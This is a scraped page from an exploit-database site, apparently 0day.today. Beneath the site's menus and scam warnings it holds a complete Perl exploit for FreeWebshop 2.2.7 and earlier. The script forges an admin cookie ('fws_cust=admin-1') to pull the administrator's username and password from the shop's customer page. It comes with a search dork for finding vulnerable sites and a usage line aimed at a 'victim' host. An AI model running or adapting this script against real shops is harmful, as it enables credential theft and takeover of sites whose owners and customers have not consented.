0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit
============================================================ FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit ============================================================ #!/usr/bin/perl # # Indonesian Newhack Security Advisory # ------------------------------------ # FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit # Waktu : Dec 17 2007 04:50AM # Software : FreeWebshop <= 2.2.7 # Vendor : http://www.freewebshop.org/ # Demo Site : http://www.freewebshop.org/demo/ # Ditemukan oleh : k1tk4t # Lokasi : Indonesia # Dork : "Powered by FreeWebshop" # # Terima Kasih untuk; # -[opt1lc, fl3xu5, ghoz]- # str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips # nyubi,iFX,sin~X,kin9k0ng,bius,selikoer,aldy_BT # Komunitas Security dan Hacker Indonesia # # ----------------------------[Cookie Injection]------------------------------------ use LWP::UserAgent; use HTTP::Cookies; if(!$ARGV[1]) { print "\n |-------------------------------------------------|"; print "\n | Indonesian Newhack Technology |"; print "\n |-------------------------------------------------|"; print "\n |FreeWebshop 2.2.7 (cookie) Admin Password Grabber|"; print "\n | Found by k1tk4t [k1tk4t(at)newhack.org] |"; print "\n |-------------------------------------------------|"; print "\n[!] "; print "\n[!] Penggunaan : perl freewebshop227.pl [URL] [Path] "; print "\n[!] Contoh : perl freewebshop227.pl http://korban.site /WebShop/"; print "\n[!] "; print "\n"; exit; } my $site = $ARGV[0]; # Site Target my $path = $ARGV[1]; # Path direktori envolution_1-0-1 my $www = new LWP::UserAgent; #my @cookie = ('Cookie' => "cookie_info=admin-1"); #Untuk Versi < = 2.2.4 my @cookie = ('Cookie' => "fws_cust=admin-1"); #Untuk Versi > = 2.2.6 my $http = "$site/$path/index.php?page=customer&action=show"; print "\n\n [~] Sedang Mencari Username dan Password.... \n"; my $injek = $www -> get($http, @cookie); my $jawaban = $injek -> content; if( $jawaban =~ /login value='(.*)'/ ){ print "\n [+] Username: $1"; $jawaban =~ /"password" name="pass1" size="10" maxlength="10" value="(.*)"/ , print "\n [+] Password: $1 \n";} else {print "\n [-] Gagal :( , Coba yang lain!";} # ----------------------------[Selesai]------------------------------------ # 0day.today [2024-07-05] #